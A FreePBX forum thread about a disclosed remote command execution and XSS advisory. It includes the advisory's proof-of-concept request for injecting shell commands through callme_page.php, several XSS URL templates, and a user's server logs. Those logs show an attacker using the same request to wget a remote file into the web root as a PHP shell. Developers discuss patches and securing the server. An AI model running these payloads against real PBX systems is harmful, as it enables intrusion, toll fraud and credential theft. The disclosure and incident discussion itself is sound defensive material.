What's going on with this alleged security exploit in FPBX?

Product: FreePBX
Version: 2.10.0, 2.9.0 and perhaps earlier versions
Type: Remote Command Execution, XSS
Release Date: March 14, 2012
Vendor Notification Date: Jun 12, 2011
Author: Martin Tschirsich
Overview:
A remote command execution vulnerability and some XSS in current and earlier
FreePBX versions due to missing input sanitization.
FreePBX is a popular implementation (500,000 active phone systems) of
Asterisk (telephony software) based around a web-based configuration
interface and other tools. Some of these installations are on a public IP
address.
Proof of Concept:
RCE:
[HOST]/recordings/misc/callme_page.php?action=c&callmenum=[PHONENUMBER] () from
-internal/n%0D%0AApplication:%20system%0D%0AData:%20[CMD]%0D%0A%0D%0A
XSS (2.9.0 and perhaps other versions):
[HOST]/panel/index_amp.php?context=[XSS]
[HOST]/panel/flash/mypage.php?clid=[XSS]
[HOST]/panel/flash/mypage.php?clidname=[base64_encode(XSS)]
[HOST]/panel/dhtml/index.php?context=/…/%00">[XSS]
[HOST]/admin/views/freepbx_reload.php/"[XSS]
[HOST]/recordings/index.php?login=’>[XSS]
Details (RCE):
Missing input sanitization in htdocs/recordings/misc/callme_page.php:
// line 28-30:
$to = $_REQUEST[‘callmenum’]; // vulnerable
$msgFrom = $_REQUEST[‘msgFrom’];
$new_path = substr($path, 0, -4);
// line 38:
$call_status = callme_startcall($to, $msgFrom, $new_path);
Missing input sanitization in htdocs/recordings/includes/callme.php:
// line 88-117:
function callme_startcall($to, $from, $new_path)
{
global $astman;
$channel = “Local/$to () from-internal/n”; // vulnerable
$context = “vm-callme”;
$extension = “s”;
$priority = “1”;
$callerid = “VMAIL/$from”;

/* Arguments to Originate: channel, extension, context, priority,
timeout, callerid, variable, account, application, data */
$status = $astman->Originate($channel, $extension, $context,
$priority, NULL, $callerid, $variable, NULL, NULL, NULL, NULL);

}
Unofficial Patch (RCE, tested with 2.9.0):
Patch htdocs/recordings/modules/callme_page.php:
http://pastebin.com/ZbX50qaZ
Patch htdocs/recordings/modules/voicemail.module:
http://pastebin.com/vv3qczfC
Disclaimer:
The vendor has been contacted and provided with a patch several times since
Jun 12, 2011. Since no intention to address this issue was shown, I felt it
was in the best interest to disclose the vulnerability.
All information in this advisory is provided on an ‘as is’ basis in the hope
that it will be useful. The author not responsible for any risks or
occurrences caused by the application of this information.

I am not sure on the exploit side but will be looking into itbut I can state that I have been on the mailer list for security reports for 2 years now and never received a email from this person. Secondly if someone found a exploit that long ago a simple PM or forum post would of had a developer looking at it. Not sure how they were reporting it.

Do you have a link to where you found this?

We also have had a public bug tracker for over 5 years now that someone could report this as a bug and include a patch. Not sure how much more we can make it for people to report things like this to us.

http://www.1337day.com/exploits/17803

Details of those can be found in #5711, #5712 and #5713

The issue in #5711 has the potential of a remote command execution.

On the FreePBX Distro that could result in a command being run as user Asterisk. Because of the security measures taken on the Distro with no sudo root access to the asterisk user, the Distro should be safe from potential root level attacks. On some other Distros that don’t have this protection, they were probably vulnerable to root level attacks. In either case the fixes have all been published.

The XSS vulnerabilities were mostly gone in 2.10 already but in any event, have been fixed as well in prior versions. Details in the tickets.

Philippe just for clarification these existed in all version of FreePBX and you fixed the exploits back to 2.6 and newer correct?

I guess maybe the person who wrote this us may not have been entirely truthful?

Because of the security measures taken on the Distro with no sudo root access to the asterisk user, the Distro should be safe from potential root level attacks

LOL :wink: The distro is not safe. The root access is not necessary. The web server runs as the same user as asterisk. It has access to all config files and credentials they contain which means FREE CALLS. The box can also be turned into a zombie and become part of a botnet. Root access would not make much difference.

btw: It is quite amazing how old this problem is and how many boxes are going to/have been exploited.

I also think you should not stick your head in the sand this time and create a CVE entry, otherwise it is going to be difficult to take your security efforts seriously.

obelisk,

I don’t think your hostility is very welcome around here, if this were your only comment of this nature I wouldn’t think anything of it, but there have been plenty more.

No one is sticking their head in the sand. The security issue is fixed and applied all the way back to 2.6. We actually don’t support releases prior to 2.9. We are in contact with security firms on most security issues and reports as we are with this one, they are pretty good a properly publishing and putting such vulnerabilities out.

The comment about root level access vs. web server level access is a simple factual statement. There is plenty of damage that can be done as user asterisk, there is a lot more that can be done and well beyond the “PBX” level at root level. Neither is good, the latter is worse.

Providing access to the server from the outside world without other protection in place is simply naive for anyone to think that there will not continue to be opportunities for exploits, there is nothing more to be said and plenty of threads across the forums that discuss this.

Yes, and it is open source. For someone as security minded as you are, shame on you for being so concerned and vocal about these issues, and not having found and pointed this out a long time ago… Don’t forget, one of the great things about open source is that there is a collective set of eyes and communities to both find and provide fixes and patches for the better of everyone. Although there is a constant and changing “core” set of developers at any given point in time actively engaged in the project, there is a constant and broad set of eyes and contributions from the community, the collective owners of this project that helps constantly better and improve it. I think you’ll find that the community works much better when things are approached in a positive and constructive manner.

GeekyBoy,

It’s not a question of the author being ‘truthful.’

I have worked with many security reporters/firms. They typically come across a vulnerability on a project like FreePBX that they are not even familiar with. The put what information that they have out and air on the side of “broadness” if they don’t know specifics. The count on folks like us to provide more details of what exactly is affected.

In the case of this one, the author was very helpful not only in discovering the vulnerability but in helping to vet various solutions to fix the vulnerability which is always very welcome in such situations.

At the end of the day, the details and what is affected is out and available and we are in communications with a security firm who I expect will be writing up the details that we provided them when they write up a proper security notification.

Thanks for your help on the other thread obelisk. You were the only one who tried to answer my question and that led me to this exploit. Turns out this exploit was my problem. The boxes were updated with the fix long ago but not before the hacker planted a few presents which were only used recently.

Thanks to the FreePBX team for fixing this although it was a bit too late for me in this case. I don’t think this one was something that could have easily been found until after it was exploited.

Cue SkyKing to come in here and take another thread off the rails again.

excusue me,
our pbx has been xss’ed causing some financial damage

as beening a developper myself with over 100 different application in the open internet I think it is a shame to sya: dont put it in theopen internet and not mention anything in your installers etc about potential known security issues

your installed base is high, very high, but with this security track record I HIGHLY doubt it will remain that way.

from my POV:
the installer is a menace, still the same old lame stuff as 5 years ago.
documentation is in a bad ashape.

good are the UI, but the ui now has created many securoty holes
if
a highly patched system
using the new modules that are available
gets compromised over the freepbx interface
then the interface is a real thread

a
AND SHOULD BE MENTIONED in the installer

schooze stick its head in the sand and behaves like MS did 10 years ago
denial…

Hi there.

The installer has been actively worked on over the past year and now has fixes and support for various distros (wheezy, ubuntu to name a few).

The documentation has been worked on actively as well. Please see: wiki.freepbx.org for more information on that one.

Also. I need to point out that you have replied to a thread that is over a year old. We fixed this a year ago. If you don’t install updates how are we suppose to help?

Taking jabs at the developers of an opensource project is pretty juvenile, my policy is not to feed the trolls, so if you want responses, grow up.

FREEPBX is an continues to be an OPENSOURCE project, if you have the skills please contribute.

This is the second old post you have pulled up today. It is an industry given that any PBX needs to be placed behind a secure hardware based firewall, even proprietary systems such as cisco, avaya etc, do not allow for access to their PBX GUI’s on the net. The fact that you did and had an issue, is your issue not ours, if you are developer you are welcome to either submit code, submit bug reports, or work on documentation that you say is lacking. Updated documentation can be found at wiki.freepbx.org, you are also welcome to review the security enhancements we have added to 2.11 which is currently in BETA, as well as the fixes that have been added to 2.10 over the past few years.

Hi everybody :
I am just arrived to this website and forum ,I find very exciting belonging to it and wish to contact anybody whois kind enough so as to lead me into PBX systems as I am interested in installing apropiate software in my PC.
Let me thank you in advance,and kind regards

                                     Rodolfo

I’m not sure to have understand but I steel have this issue on my server. centos6 x64, asterisk 1.8, freepbx 2.9 with all modules updated.
Samples of the logs:

[[email protected] ~]# mysql -uroot asterisk -e “select version from modules where modulename = ‘fw_ari’”|grep -v version
2.9.0.8
[[email protected] ~]# grep 23.88.165.110 /var/log/httpd/access_log-20130922
23.88.165.110 - - [19/Sep/2013:08:00:10 -0400] “GET /recordings/theme/iefixes.css HTTP/1.1” 200 283 “-” "curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5"
23.88.165.110 - - [19/Sep/2013:15:15:06 -0400] “GET /recordings/misc/callme_page.php?action=c&[email protected]/n%0D%0AApplication:%20system%0D%0AData:%20wget%20http://xmors.org/web.txt%20-O%20/var/www/html/recordings/locale/mg.php%0D%0A%0D%0A HTTP/1.1” 200 1125 “-” "curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5"
23.88.165.110 - - [19/Sep/2013:15:15:06 -0400] “GET /recordings/locale/mg.php HTTP/1.1” 200 137 “-” "curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5"
23.88.165.110 - - [19/Sep/2013:17:51:57 -0400] “GET /recordings/misc/callme_page.php?action=c&[email protected]/n%0D%0AApplication:%20system%0D%0AData:%20wget%20http://xmors.org/web.txt%20-O%20/var/www/html/recordings/locale/mg.php%0D%0A%0D%0A HTTP/1.1” 200 1125 “-” "curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5"
23.88.165.110 - - [19/Sep/2013:17:51:57 -0400] “GET /recordings/locale/mg.php HTTP/1.1” 200 - “-” “curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5”
[[email protected] ~]#

Thanks,
Best regards.
Charlie

Whileist you are getting hit with the attack that doesnt mean they are succeeding. People try to brute force their way into systems all day long with exploits 7 years old or more against various software daily.

Hello,
This server has been hacked for $170, they have successfully “injected” and ran a script, get an extension credential…

Best regards.
Charlie

Charlie,
Please ensure that you have updated the FreePBX ARI Framework module as looking through our issue tracker I show that we published a fix for this vulnerability back in 2012 when it was brought to our attention.

Also you may or may not know that the current stable release of FreePBX is 2.11, and may wish to upgrade your 2.9 system to a more current release.

Hello Bryan,

Thank you for your response. I’m happy with the “simplicity” of FreePBX 2.9 that’s the reason for why I did not upgrade to 2.10 and up version. From another hand I have a lot of Freepbx 2.9 based servers in production and from what I read ARI module version 2.9.0.8 is the latest, please correct me if I’m wrong.

Thanks again,
Best regards.
Charlie

We’ve confirmed the bug fix that we implemented in FreePBX 2.6 through 2.11 protects against the attack vectors you mentioned utilizing the information you provided. If you are still seeing the vulnerability it appears something must not be updated on your system. We suggest you do a clean install if you can not determine what’s wrong with your system or contact our support department (please note that support is a paid product should you decide to go that route).